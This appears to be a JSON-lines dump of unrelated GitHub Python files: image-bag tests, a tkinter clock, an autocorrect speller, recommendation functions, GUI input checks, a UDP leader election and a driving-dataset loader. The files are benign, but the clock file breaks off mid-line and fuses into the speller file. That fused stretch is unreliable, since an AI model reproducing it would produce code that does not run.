'foo')\ntest_original = 'IMG_4107.JPG'\ntest_original_path = join(test_bag_path, 'data', test_original)\ntest_master_path = join(test_bag_path, 'data', 'master.tif')\n\n\ndef setup_module():\n \"\"\"Change me\"\"\"\n pass\n\n\ndef teardown_module():\n \"\"\"Change me\"\"\"\n pass\n\n\nclass Test_Image_Basics(TestCase):\n\n def setUp(self):\n \"\"\"Change me\"\"\"\n if exists(test_bag_path):\n rmtree(test_bag_path)\n\n def tearDown(self):\n \"\"\"Delete temporary items\"\"\"\n if exists(test_bag_path):\n rmtree(test_bag_path)\n\n def test_image_construct(self):\n \"\"\"Test Image Construction\"\"\"\n im = ImageBag(test_bag_path, auto_make=True)\n assert_true(isinstance(im, ImageBag))\n del im\n\n @raises(OSError)\n def test_image_construct_exists(self):\n makedirs(test_bag_path)\n im = ImageBag(test_bag_path, auto_make=True)\n del im\n\n @raises(OSError)\n def test_image_construct_fail(self):\n \"\"\"Test Image Construction Failure (does not exist)\"\"\"\n im = ImageBag(test_bag_path) # default: auto_make=False\n del im\n\n\nclass Test_Image_Import(TestCase):\n\n def setUp(self):\n \"\"\"Change me\"\"\"\n if exists(test_bag_path):\n rmtree(test_bag_path)\n\n def tearDown(self):\n \"\"\"Change me\"\"\"\n if exists(test_bag_path):\n rmtree(test_bag_path)\n\n def test_import(self):\n im = ImageBag(test_bag_path, auto_make=True)\n im.accession(join(test_data_path, 'src', 'IMG_4107.JPG'))\n assert_true(exists(test_original_path))\n assert_true(exists(test_master_path))\n with open(join(test_bag_path, 'bag-info.txt'), 'r') as f:\n lines = [l[:-1] for l in f.readlines()]\n del f\n for line in lines:\n print(line)\n assert_true(lines[0].startswith(\"Bag-Software-Agent: bagit.py\"))\n assert_true(lines[1].startswith(\"Bagging-Date: \"))\n assert_equal(lines[2], \"Master-Filename: master.tif\")\n assert_true(lines[3].startswith(\"Original-Accession-Path:\"))\n assert_equal(lines[4], \"Original-Filename: IMG_4107.JPG\")\n assert_true(exists(join(test_data_path, 'src', 'IMG_4107.JPG')))\n\n","repo_name":"paregorios/moondog","sub_path":"tests/test_images.py","file_name":"test_images.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70779475629","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 3 13:29:40 2019\n\n@author: LHJ\n\"\"\"\n\n\nimport numpy as np\nimport os\nimport math\nfrom skimage import io, transform\n#import cv2\n\nclass Datarange(object):\n \"\"\"\n A class used to crop image\n \"\"\"\n def __init__(self, \n data_in_path = '/media/zfq/My_Passport/SIM/Raw_data/ALL_data/microtubule/Training_Testing/HE_X2/',\n data_out_path= \"/media/zfq/My_Passport/SIM/Raw_data/ALL_data/microtubule/Training_Testing/HER/\",\n \n img_type=\"tif\"):\n \n file_name = os.listdir(data_in_path)\n self.sample_number = len(file_name) # the number of samples for training \n \n self.data_in_path = data_in_path\n self.data_out_path = data_out_path\n self.img_type = img_type\n \n self.train_data_dir = os.listdir(self.data_in_path)\n def maximum_intensity(self):\n sample_number = self.sample_number # the number of samples for training\n data_in_path = self.data_in_path\n data_out_path = self.data_out_path\n img_type = self.img_type \n max_in = 0\n max_out = 0\n for sample_num in range(sample_number):\n filepath = os.path.join(data_in_path, self.train_data_dir[sample_num]) \n image_name = os.path.join(filepath, \"HE_00.\" + img_type)\n image = io.imread(image_name)\n m_in = image.flatten().max()\n if m_in > max_in:\n max_in = m_in \n \n for sample_num in range(sample_number):\n filepath = os.path.join(data_out_path, self.train_data_dir[sample_num]) \n image = io.imread(filepath+\".\"+img_type)\n m_out = image.flatten().max()\n if m_out > max_out:\n max_out = m_out \n \n max_intenty_value = {'max_in': max_in,'max_out':max_out}\n return max_intenty_value\n\nif __name__ == \"__main__\":\n mydata = Datarange()\n intensity_v = mydata.maximum_intensity()\n print(intensity_v['max_in'])\n print(intensity_v['max_out'])\n","repo_name":"drbeiliu/DeepLearning","sub_path":"Data_preprocessing/datarange.py","file_name":"datarange.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"35956068741","text":"#destined for parameters.py\ndef Parameters():\n # run variable parameters\n money_values = [False] #[True, False]\n numeraire_values = ['wage'] #['wage', 'money']\n\n # firm variable parameters\n gamma_values = [.7]\n zeta_0_values = [.55] #price elasticity of demand for rice in the US (2008).\n z_error_values = [.7]\n inertia_values = [.5] #[x / 10 for x in range(11)]\n eta_0_values = [1]\n x_error_values = [.3]\n mF_0_values = [0]\n expiration_values = [1] #percentage of stock which expires each timestep\n\n #household variable parameters\n Lmax_values = [400] \n alpha_values = [.2] \n beta_values = [.8] \n mH_0_values = [0]\n saving_values = [0]\n \n param_names = ['money', 'numeraire', \n 'gamma', 'zeta_0', 'z_error', 'inertia', 'eta_0', 'x_error', 'mF_0', 'expiration',\n 'Lmax', 'alpha', 'beta', 'mH_0', 'saving']\n\n param_lists = [[m, n, g, z, ze, i, e, xe, mf, ex, l, a, b, mh, s] for m in money_values for n in numeraire_values for g in gamma_values for z in zeta_0_values\n for ze in z_error_values for i in inertia_values for e in eta_0_values for xe in x_error_values\n for mf in mF_0_values for ex in expiration_values for l in Lmax_values for a in alpha_values for b in beta_values for mh in mH_0_values for s in saving_values]\n\n param_sets = [dict(zip(param_names, p)) for p in param_lists]\n runs = len(param_lists)\n print('This session is', runs, 'runs.')\n \n return(param_sets)","repo_name":"asuberlin/price_wage_dynamics","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28808160385","text":"from tkinter import *\nimport time\n\nikkuna = Tk()\nikkuna.resizable(False,False)\nikkuna.title(\"Kello\")\n\naika = time.strftime(\"%d.%m.%Y %H:%M:%S\")\nlast = time.time()\n\ntextColors = ['black', 'blue', 'yellow', 'green', 'red', 'white']\nbackgroundColors = ['white', 'yellow', 'blue', 'red', 'green', 'black']\ncolor = 0\n\nkello = Label(ikkuna, text=aika, font=('Comic Sans MS', 20), width=30)\nkello.grid(row=0, column=0)\n\nwhile True:\n if (time.time() > last+1):\n aika = time.strftime(\"%d.%m.%Y %H:%M:%S\")\n color = color+1 if (color 0:\n print('Original number of words: {}'\n .format(len(self.nlp_data)))\n self.nlp_data = {k: v for k, v in self.nlp_data.items()\n if v >= threshold}\n print('After applying threshold: {}'\n .format(len(self.nlp_data)))\n\n def existing(self, words):\n \"\"\"{'the', 'teh'} => {'the'}\"\"\"\n return set(word for word in words\n if word in self.nlp_data)\n\n def autocorrect_word(self, word):\n \"\"\"most likely correction for everything up to a double typo\"\"\"\n def get_candidates(word):\n w = Word(word, self.lang)\n candidates = (self.existing([word]) or\n self.existing(w.typos()) or\n self.existing(w.double_typos()) or\n [word])\n return [(self.nlp_data.get(c, 0), c) for c in candidates]\n\n candidates = get_candidates(word)\n\n # in case the word is capitalized\n if word[0].isupper():\n decapitalized = word[0].lower() + word[1:]\n candidates += get_candidates(decapitalized)\n\n best_word = max(candidates)[1]\n\n if word[0].isupper():\n best_word = best_word[0].upper() + best_word[1:]\n return best_word\n\n def autocorrect_sentence(self, sentence):\n return re.sub(word_regexes[self.lang],\n lambda match: self.autocorrect_word(match.group(0)),\n sentence)\n\n __call__ = autocorrect_sentence\n\n\n# for backward compatibility\nclass LazySpeller:\n def __init__(self):\n self.speller = None\n\n def __call__(self, sentence):\n print('autocorrect.spell is deprecated, \\\n use autocorrect.Speller instead')\n if self.speller is None:\n self.speller = Speller()\n return self.speller(sentence)\n\n\nspell = LazySpeller()\n","repo_name":"EanNewton/FamBot","sub_path":"speller/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33321945419","text":"from math import sqrt\n\n# Returns a distance-based similarity score for person1 and person2\ndef sim_distance(prefs,person1,person2):\n # Get the list of shared_items\n si={}\n for item in prefs[person1]:\n \tif item in prefs[person2]:\n \t\tsi[item]=1\n\n # if they have no ratings in common, return 0\n if len(si)==0:\n \treturn 0\n\n # Add up the squares of all the differences\n sum_of_squares=sum( [pow( prefs[person1][item] - prefs[person2][item] , 2 ) for item in prefs[person1] if item in prefs[person2]] ) \n\n return 1/(1+sum_of_squares)\n\n\n\ndef sim_pearson(prefs,p1,p2):\n\t # Get the list of mutually rated items\n\n\tsi={}\n\n\n\tfor item in prefs[p1]:\n\t\tif item in prefs[p2]:\n\t\t\tsi[item]=1\n\n\n\t# Find the number of elements\n\tn = len(si)\n\n\n\t# if they are no ratings in common, return 0\n\tif n==0:\n\t\treturn 0\n\n\n\t# Add up all the preferences\n\tsum1=sum([prefs[p1][it] for it in si])\n\n\tsum2=sum([prefs[p2][it] for it in si])\n\n\n\t# Sum up the squares\n\tsum1Sq=sum([pow(prefs[p1][it],2) for it in si])\n\n\tsum2Sq=sum([pow(prefs[p2][it],2) for it in si])\n\n\n\t# Sum up the products\n\tpSum=sum([prefs[p1][it]*prefs[p2][it] for it in si])\n\n\t# Calculate Pearson score\n\tnum=pSum-(sum1*sum2/n)\n\n\tden=sqrt((sum1Sq-pow(sum1,2)/n)*(sum2Sq-pow(sum2,2)/n))\n\n\tif den==0:\n\t\treturn 0\n\n\tr=num/den\n\n\treturn r\n\n\n\ndef topMatches(prefs, person, n=5, similarity=sim_pearson):\n\n\t#The LOC below runs the specified Algorithm , in our case SIM_PEARSON if the PERSON provided at Function Call is not the same person being compared to at Algorithm Running\n\t#Then it stores it in a List called Scores and since the Algorithms returns only a score, we put a comma ',' and include the Owners of the Rating Name i.e 'other' beside it\n\t#i.e 0.99, 'Lisa Rose'\n\n\tscores=[ ( similarity(prefs,person,other), other ) for other in prefs if other!=person ]\n\n # Sort the list so the highest scores appear at the top\n\tscores.sort( )\n\n # Optionally We Revert the List So the Highest Scores are in front\n\tscores.reverse( )\n\n#Lastly we return the N Numbers of Highest Scores i.e Similarity\n\treturn scores[0:n]\n\n\ndef getRecommendations(prefs,person,similarity=sim_pearson):\n \n totals={}\n\n simSums={}\n \n\n\n\n\n\n\n for other in prefs:\n # don't compare me to myself\n \tif other==person:\n \t\tcontinue\n \t\n \tsim=similarity(prefs,person,other)\n\n \tif sim <= 0:\n \t\tcontinue\n\n\n \tfor item in prefs[other]:\n\t # only score movies I haven't seen yet\n\t \tif item not in prefs[person] or prefs[person][item]==0:\n\n\t\t #Total of all (Similarity * Score)\n\t\t \ttotals.setdefault(item,0)\n\t\t \n\t\t \ttotals[item]+=prefs[other][item]*sim\n\t\t \n\t\t # Sum of similarities\n\t\t \tsimSums.setdefault(item,0)\n\t\t \n\t\t \tsimSums[item]+=sim\n \n # Create the normalized list\n rankings=[(total/simSums[item],item) for item,total in totals.items( )]\n \n # Return the sorted list\n rankings.sort( )\n rankings.reverse( )\n return rankings\n\n\ndef transformPrefs(prefs):\n\n result={}\n for person in prefs:\n \tfor item in prefs[person]:\n \t\tresult.setdefault(item,{})\n \n # Flip item and person\n \t\tresult[item][person]=prefs[person][item]\n \n return result\n\n\ndef calculateSimilarItems(prefs,n=10):\n # Create a dictionary of items showing which other items they\n # are most similar to.\n result={}\n \n # Invert the preference matrix to be item-centric\n itemPrefs=transformPrefs(prefs)\n \n c=0\n \n for item in itemPrefs:\n # Status updates for large datasets\n \tc+=1\n \n \tif c%100==0:\n \t\tprint(\" %s / %s \" % (c , len(itemPrefs)) ) \n # Find the most similar items to this one\n \tscores=topMatches(itemPrefs,item,n=n,similarity=sim_distance)\n\n \tresult[item]=scores\n \n return result\n\n\ndef getRecommendedItems(prefs,itemMatch,user):\n\n\n\n try:\n \tuserRatings=prefs[user]\n except KeyError:\n \treturn []\n\n scores={}\n totalSim={}\n \n # Loop over items rated by this user\n for (item,rating) in userRatings.items( ):\n\n\t # Loop over items similar to this one\n\t for (similarity,item2) in itemMatch[item]:\n\n\t \t# Ignore if this user has already rated this item\n\t \tif item2 in userRatings:\n\t \t\tcontinue\n\n\t\t\t \n\t\t# Weighted sum of rating times similarity\n \t\tscores.setdefault(item2,0)\n\n \t\tscores[item2]+=similarity*rating\n\n\t\t \n\t\t# Sum of all the similarities\n \t\ttotalSim.setdefault(item2,0)\n\n \t\ttotalSim[item2]+=similarity\n\t\t \n\t # Divide each total score by total weighting to get an average\n try:\n \trankings=[ [ score/totalSim[item] , item ] for item,score in scores.items( )]\n except ZeroDivisionError:\n \trankings = []\n \n # Return the rankings from highest to lowest\n rankings.sort( )\n rankings.reverse( )\n \n return rankings\n\n","repo_name":"esomnofu/kitkat","sub_path":"products/recommendations.py","file_name":"recommendations.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4978020828","text":"'''\nentry_checks.py\n\nMay 2022 -- Created -- Mark Ortega-Ponce & Chris Hance\n\n'''\nimport sys\nimport os\nimport datetime\nimport plot.plot_three_axis_graphs\nimport util.station_names\nimport numpy as np\nfrom PySide6.QtWidgets import (QMessageBox)\n\ndef station_code_entry_check(station_name: str) -> bool:\n '''\n Additional check for the station code. \n Makes sure station code entry is a valid 2-4 character station name.\n\n Returns\n -------\n True/False : bool\n False if passed string not in station names, true if it is.\n '''\n # Iterate over columns\n for i in range(0, 3):\n # Iterate over rows\n for x in range(2, 11):\n if station_name == util.station_names.names[x][i]:\n return True\n # If it passed check return True\n return False\n\ndef year_day_entry_check(self) -> bool:\n '''\n Checks to see if there was any input for the \n year day value. Warns user if no input.\n\n Returns\n -------\n True/False : bool\n False if it failed test, true if it passed test.\n '''\n if (len(self.input_year.get_entry()) == 0):\n self.warning_message_pop_up(\n \"Failed Year Day Check\"\n \"There was no input for the year day entry box\")\n return False\n # If it passed check return True\n return True\n\ndef min_max_time_check(self) -> bool:\n '''\n Checks the two time widgets and \n checks if the start time is less than the end time.\n\n Returns\n -------\n True/Fasle : bool\n False if it failed test, true if it passed test. \n '''\n s_hour = self.start_time.get_hour()\n s_minute = self.start_time.get_minute()\n s_second = self.start_time.get_second()\n\n e_hour = self.end_time.get_hour()\n e_minute = self.end_time.get_minute()\n e_second = self.end_time.get_second()\n\n # start hour is already less than end hour no need to check min or sec\n if s_hour < e_hour:\n return True\n #if start and end hour is same we have to compare min and then sec if need be \n elif s_hour == e_hour:\n # Compare minutes\n if s_minute < e_minute:\n return True\n elif s_minute == e_minute:\n #compare seconds\n if s_second < e_second:\n return True\n else: \n return False\n\ndef axis_entry_checks(x_arr: np.array, y_arr: np.array, z_arr: np.array,\n min_x: int, max_x: int,\n min_y: int, max_y: int,\n min_z: int, max_z: int) -> tuple[int, int, int,\n int, int, int]:\n '''\n Normalizes range of graphs to be about the same.\n Present data in a non-biased view, rather than zoomed into min-max range.\n\n Parameters\n ----------\n x_arr : list\n List of x-values. Pulls min/max in case none were entered by user.\n y_arr : list\n List of y-values. Pulls min/max in case none were entered by user.\n z_arr : list\n List of z_values. Pulls min/max in case none were entered by user.\n min_x : int\n Min x entry from the user, if any.\n max_x : int\n Max x entry from the user, if any.\n min_y : int\n Min y entry from the user, if any.\n max_y : int\n Max y entry from the user, if any.\n min_z : int\n Min z entry from the user, if any.\n max_z : int\n Max z entry from the user, if any.\n\n Returns\n -------\n min_x : int \n Returns default min_x if no input, else returns user input.\n max_x : int\n Returns default max_x if no input, else returns user input.\n min_y : int\n Returns default min_y if no input, else returns user input.\n max_y : int\n Returns default max_y if no input, else returns user input.\n min_z : int\n Returns default min_z if no input, else returns user input.\n max_z : int\n Returns default max_z if no input, else returns user input.\n '''\n # TODO: Add a check for no record value of 99,999.99? If we don't, it will choose as max.\n\n default_min_x = np.min(x_arr)\n default_max_x = np.max(x_arr)\n x_midpoint = (default_min_x + default_max_x) / 2\n default_x_range = default_max_x - default_min_x\n\n default_min_y = np.min(y_arr)\n default_max_y = np.max(y_arr)\n y_midpoint = (default_min_y + default_max_y) / 2\n default_y_range = default_max_y - default_min_y\n\n default_min_z = np.min(z_arr)\n default_max_z = np.max(z_arr)\n z_midpoint = (default_min_z + default_max_z) / 2\n default_z_range = default_max_z - default_min_z\n\n # start normalizing ranges between all three graphs\n axis_ranges = [default_x_range, default_y_range, default_z_range]\n\n max_axis_range = np.max(axis_ranges)\n # increasing range by 5%\n # dont want min-max values to be on the\n # edge of the graph from my understanding\n max_axis_range = max_axis_range + max_axis_range * .05\n\n default_min_x = x_midpoint - max_axis_range\n default_min_y = y_midpoint - max_axis_range\n default_min_z = z_midpoint - max_axis_range\n\n default_max_x = x_midpoint + max_axis_range\n default_max_y = y_midpoint + max_axis_range\n default_max_z = z_midpoint + max_axis_range\n\n if min_x == 0:\n min_x = int(default_min_x)\n\n if max_x == 0:\n max_x = int(default_max_x)\n\n if min_y == 0:\n min_y = int(default_min_y)\n\n if max_y == 0:\n max_y = int(default_max_y)\n\n if min_z == 0:\n min_z = int(default_min_z)\n\n if max_z == 0:\n max_z = int(default_max_z)\n\n return min_x, max_x, min_y, max_y, min_z, max_z\n\n# TODO: See if we can modify logic for function calls.\ndef graph_from_plotter_entry_check(xArr: np.array, yArr: np.array, zArr: np.array,\n x_state: bool, y_state: bool,\n z_state: bool, timeArr: np.array,\n filename: str, stime: datetime,\n etime: datetime, format=\"2hz\"):\n \"\"\"\n Plot x, y, z axis depending if they are checked inside the gui.\n\n Parameters\n ----------\n xArr : list\n The x array values.\n yArr : list\n The y array values.\n zArr : list\n The z array values.\n x_state : bool\n The state of x_checkbox in gui.\n y_state : bool\n The state of y_checkbox in gui.\n z_state : bool\n The state of z_checkbox in gui.\n timeArr : list\n The time array values.\n filename : list \n The name of the file.\n stime : Datetime\n The start time stamp HH:MM:SS.\n etime : Datetime\n The end time stamp HH:MM:SS.\n\n Returns\n -------\n fig : Matplotlib.Figure\n The plotted figure.\n \"\"\"\n\n # X, Y, Z plot, clean or raw\n if x_state and y_state and z_state:\n\n fig = plot.plot_three_axis_graphs.x_y_and_z_plot(\n xArr, yArr, zArr, timeArr, filename, stime, etime, format)\n\n # Y, Z plot, clean or raw\n elif y_state and z_state:\n\n fig = plot.plot_three_axis_graphs.plot_two_axis(\n yArr, zArr, timeArr, filename, stime, etime, 'Y', 'Z', format)\n\n # X, Z plot, clean or raw\n elif x_state and z_state:\n\n fig = plot.plot_three_axis_graphs.plot_two_axis(\n xArr, zArr, timeArr, filename, stime, etime, 'X', 'Z', format)\n\n # X, Y plot, clean or raw\n elif x_state and y_state:\n\n fig = plot.plot_three_axis_graphs.plot_two_axis(\n xArr, yArr, timeArr, filename, stime, etime, 'X', 'Y', format)\n\n # For single axis plotting\n else:\n\n if (x_state):\n fig = plot.plot_three_axis_graphs.plot_axis(\n xArr, timeArr, filename, stime, etime, 'X', format)\n\n if(y_state):\n fig = plot.plot_three_axis_graphs.plot_axis(\n yArr, timeArr, filename, stime, etime, 'Y', format)\n\n if(z_state):\n fig = plot.plot_three_axis_graphs.plot_axis(\n zArr, timeArr, filename, stime, etime, 'Z', format)\n\n return fig\n\ndef set_axis_entrys(self, x_min: int, x_max: int, y_min:\n int, y_max: int, z_min: int, z_max: int):\n '''\n Sets the min/max values for x, y, z inside the gui.\n Allows user to see exactly what is being used to plot.\n\n Parameters\n ----------\n x_min : int\n Min x value to set inside the gui.\n x_max : int\n Max x value to set inside the gui.\n y_min : int\n Min y value to set inside the gui.\n y_max : int\n Max y value to set inside the gui.\n z_min : int\n Min z value to set inside the gui.\n z_max : int\n Max z value to set inside the gui.\n '''\n self.spinbox_min_x.set_entry(x_min)\n self.spinbox_max_x.set_entry(x_max)\n self.spinbox_min_y.set_entry(y_min)\n self.spinbox_max_y.set_entry(y_max)\n self.spinbox_min_z.set_entry(z_min)\n self.spinbox_max_z.set_entry(z_max)\n\ndef same_entries(self) -> bool:\n '''\n Function to check if current information in the gui\n has already been plotted in the stacked graph style.\n Checks to see if:\n - Current start time is equal to previous start time.\n - Current end time is equal to previous end time.\n - Current x/y/z min values are equal to previous min x/y/z values.\n - Current x/y/z max values are equal to previous max x/y/z values.\n If all these 8 checks result in true, then we return false to indicate\n test failed, and to not plot the graph again. Plotting takes (~1.5 seconds)\n and gui cannot respond to any other user events during this time.\n\n Returns\n -------\n True/False : bool\n False if passed string not in station names, true if it is.\n '''\n\n # get current start times, and end time\n curr_start_time, curr_end_time = self.time_stamp()\n\n flag = 0\n\n if curr_start_time == self.start_time_stamp:\n flag += 1\n if curr_end_time == self.end_time_stamp:\n flag += 1\n if self.prev_min_x == self.spinbox_min_x.get_entry():\n flag += 1\n if self.prev_max_x == self.spinbox_max_x.get_entry():\n flag += 1\n if self.prev_min_y == self.spinbox_min_y.get_entry():\n flag += 1\n if self.prev_max_y == self.spinbox_max_y.get_entry():\n flag += 1\n if self.prev_min_z == self.spinbox_min_z.get_entry():\n flag += 1\n if self.prev_max_z == self.spinbox_max_z.get_entry():\n flag += 1\n\n if flag == 8:\n # exact same entries\n return False\n else:\n return True\n\ndef same_entries_one_toggled(self) -> bool:\n '''\n Function to check if current information in the gui\n has already been plotted in the three graph axis style graph.\n Checks to see if:\n - Current start time is equal to previous start time.\n - Current end time is equal to previous end time.\n - Current x checkbox state is same as previous state.\n - Current y checkbox state is same as previous state.\n - Current z checkbox state is same as previous state.\n If all these 5 checks result in true, then we return false to\n indicate test failed, and to not plot the graph again. Plotting\n takes (~1.5 seconds) and gui cannot respond to any other user\n events during this time.\n\n Returns\n -------\n True/False : bool\n False if passed string not in station names, true if it is.\n '''\n\n curr_start_time, curr_end_time = self.time_stamp()\n\n flag = 0\n\n if curr_start_time == self.start_time_stamp:\n flag += 1\n if curr_end_time == self.end_time_stamp:\n flag += 1\n\n if self.prev_state_plot_x == self.checkbox_x.isChecked():\n flag += 1\n\n if self.prev_state_plot_y == self.checkbox_y.isChecked():\n flag += 1\n\n if self.prev_state_plot_z == self.checkbox_z.isChecked():\n flag += 1\n\n if flag == 5:\n return False\n else:\n return True\n\n# TODO: See if logic can me modified for this inside the gui.\ndef same_axis_entries(self) -> bool:\n '''\n Function to check if user has changed axis or\n time widget in the gui, but left entry values the same.\n If true is returned, we reset the gui entries\n so graph can pick new min/max values for the graph\n based off values in the new time range. If value's aren't\n reset the graph will have min/max values that might not\n actually be inside the time range picked, making the graph\n appear flat.\n '''\n\n flag = 0\n\n if self.prev_min_x == self.spinbox_min_x.get_entry():\n flag += 1\n if self.prev_max_x == self.spinbox_max_x.get_entry():\n flag += 1\n if self.prev_min_y == self.spinbox_min_y.get_entry():\n flag += 1\n if self.prev_max_y == self.spinbox_max_y.get_entry():\n flag += 1\n if self.prev_min_z == self.spinbox_min_z.get_entry():\n flag += 1\n if self.prev_max_z == self.spinbox_max_z.get_entry():\n flag += 1\n\n if flag == 6:\n return True\n else:\n return False\n\n\ndef checks(self) -> bool:\n \n '''\n Function that goes through most of the entry_check.py functions.\n - Checks for filename, has user chosen a file yet?\n - Checks for valid station code.\n - Checks for valid year day value.\n - Checks that start time is less than end time.\n - Checks that at least one checkbox is checked if we \n are in one graph mode.\n If any of these tests fail, we return false.\n\n Returns\n -------\n True/False : bool\n False if passed string not in station names, true if it is.\n '''\n\n # Makes sure we have a file\n if len(self.filename) == 0:\n return False\n\n # Checks the 2 char station code is a code that fits in our station_names.py array\n station_code = self.input_station_code.get_entry()\n if not station_code_entry_check(station_code):\n return False\n\n # Just makes sure there is some entry in the yearday slot \n # Right now no real check to see if the year day is a valid combo\n # but if we have a value the file itself should lay it properly before hand\n year_day = self.input_year.get_entry()\n if not year_day_entry_check(self):\n return False\n\n if not min_max_time_check(self):\n return False\n\n x_state = self.checkbox_x.isChecked()\n y_state = self.checkbox_y.isChecked()\n z_state = self.checkbox_z.isChecked()\n\n any_state = x_state or y_state or z_state\n\n if self.button_graph_switch.three_axis_style.isChecked():\n if not any_state:\n return False\n\n return True\n","repo_name":"maccs-augsburg/spacedatapython","sub_path":"gui/entry_check.py","file_name":"entry_check.py","file_ext":"py","file_size_in_byte":14456,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20019171971","text":"import socket\nimport json\n\n\nclass RAFTFactory:\n \"\"\"Functionality for the initial election in RAFT.\"\"\"\n\n def __init__(self, service_info : dict,\n udp_host : str = \"127.0.0.1\",\n udp_port : int = 4444,\n udp_buffer_size : int = 1024,\n num_followers : int = 2):\n self.udp_host = udp_host\n self.udp_port = udp_port\n self.udp_buffer_size = udp_buffer_size\n self.udp_socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n self.service_info = service_info\n self.num_followers = num_followers\n self.followers = []\n\n\n def election(self):\n \"\"\"\n Determines the leader and the followers. \n The first one connected to the UDP connection\n will be the leader the rest will be the followers.\n \"\"\"\n\n # The election ends when all the expected number of followers\n # connected and each sent 2 messages: accept and credentials.\n self.min_num_msgs = self.num_followers * 2\n\n # All services try to connect using the UDP connection\n # and try bind to the connection.\n try:\n # Only one will succeed in this, and this service will become the Leader.\n self.udp_socket.bind((self.udp_host, self.udp_port))\n self.role = \"leader\"\n\n # Starting to gather the information about the followers as they connect using UDP.\n count_of_msgs = 0\n while True:\n # Reading the message and the address from connection.\n message, address = self.udp_socket.recvfrom(self.udp_buffer_size)\n\n if message.decode() == \"Accept\":\n # The Leader should responde back with it's HTTP credentials \n # (ip, port, token for writes) to inform the followers about it's location.\n # if the follower accepted him.\n data = json.dumps(self.service_info)\n count_of_msgs += 1\n self.udp_socket.sendto(str.encode(data), address)\n else:\n # After getting the Leader's information the \n # Followers should send back their HTTP credentials.\n message = message.decode()\n count_of_msgs += 1\n follower_data = json.loads(message)\n self.followers.append(follower_data)\n if count_of_msgs >= self.min_num_msgs:\n break\n except:\n # The rest of services will become Followers.\n self.role = \"follower\"\n\n # After becoming a Follower the services should send to \n # the leader an accept message informing they accept him being a leader.\n self.leader_data = self.send_data(\"Accept\")\n\n # Sending back to the leader the follower's credentials.\n self.send_data(self.service_info)\n self.udp_socket.close()\n\n\n def send_data(self, msg):\n \"\"\"Data send by the followers.\"\"\"\n\n if type(msg) is str:\n # Send the accept message to the leader.\n bytes_to_send = str.encode(msg)\n self.udp_socket.sendto(bytes_to_send, (self.udp_host, self.udp_port))\n msg_from_server = self.udp_socket.recvfrom(self.udp_buffer_size)[0]\n return json.loads(msg_from_server.decode())\n else:\n # Send the followers credentials to the leader.\n str_dict = json.dumps(msg)\n bytes_to_send = str.encode(str_dict)\n self.udp_socket.sendto(bytes_to_send, (self.udp_host, self.udp_port))","repo_name":"Frunnze/PR_Laboratories","sub_path":"LAB8/service1/raft.py","file_name":"raft.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11825555551","text":"import gzip\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom util import \\\n available_actions, \\\n data_transform, \\\n DATA_DIR, \\\n DATA_FILE, \\\n MODEL_FILE\n\nrestore = False # restore from file if exists\nBATCH_SIZE = 32 # mb size\nEPOCHS = 30 # number of epochs\nTRAIN_VAL_SPLIT = 0.85 # train/val ratio\n\n# balance the dataset by multiplying rare events\nMULTIPLY_RARE_EVENTS = 20\n\n\ndef read_data():\n \"\"\"Read the data generated by keyboard_agent.py\"\"\"\n with gzip.open(os.path.join(DATA_DIR, DATA_FILE), 'rb') as f:\n data = pickle.load(f)\n\n # balance dataset by multiplying\n # brake, right+brake, left+brake events\n # since they are too few\n if MULTIPLY_RARE_EVENTS > 1:\n data_copy = data.copy()\n for d in data:\n for a in ([[-1, 0, 1], [1, 0, 1], [0, 0, 1]]):\n if np.array_equal(d[1], a):\n data_copy += (d,) * MULTIPLY_RARE_EVENTS\n\n data = data_copy\n\n random.shuffle(data)\n\n # to numpy arrays\n states, actions, _, _, _ = map(np.array, zip(*data))\n\n # reverse one-hot, actions to classes\n act_classes = np.full((len(actions)), -1, dtype=np.int)\n for i, a in enumerate(available_actions):\n act_classes[np.all(actions == a, axis=1)] = i\n\n # drop unsupported actions\n states = np.array(states)\n states = states[act_classes != -1]\n act_classes = act_classes[act_classes != -1]\n\n # drop some of the acceleration actions to balance the dataset\n non_accel = act_classes != available_actions.index([0, 1, 0])\n drop_mask = np.random.rand(act_classes[~non_accel].size) > 0.7\n non_accel[~non_accel] = drop_mask\n states = states[non_accel]\n act_classes = act_classes[non_accel]\n\n # drop some of the non-action actions to balance the dataset\n non_act = act_classes != available_actions.index([0, 0, 0])\n drop_mask = np.random.rand(act_classes[~non_act].size) > 0.3\n non_act[~non_act] = drop_mask\n states = states[non_act]\n act_classes = act_classes[non_act]\n\n for i, a in enumerate(available_actions):\n print(\"Actions of type {}: {}\"\n .format(str(a), str(act_classes[act_classes == i].size)))\n\n print(\"Total transitions: \" + str(len(act_classes)))\n\n return states, act_classes\n\n\ndef create_datasets():\n \"\"\"Create training and validation datasets\"\"\"\n\n class TensorDatasetTransforms(torch.utils.data.TensorDataset):\n \"\"\"\n Helper class to allow transformations\n by default TensorDataset doesn't support them\n \"\"\"\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def __getitem__(self, index):\n tensor = data_transform(self.tensors[0][index])\n return (tensor,) + tuple(t[index] for t in self.tensors[1:])\n\n x, y = read_data()\n x = np.moveaxis(x, 3, 1) # channel first (torch requirement)\n\n # train dataset\n x_train = x[:int(len(x) * TRAIN_VAL_SPLIT)]\n y_train = y[:int(len(y) * TRAIN_VAL_SPLIT)]\n\n train_set = TensorDatasetTransforms(\n 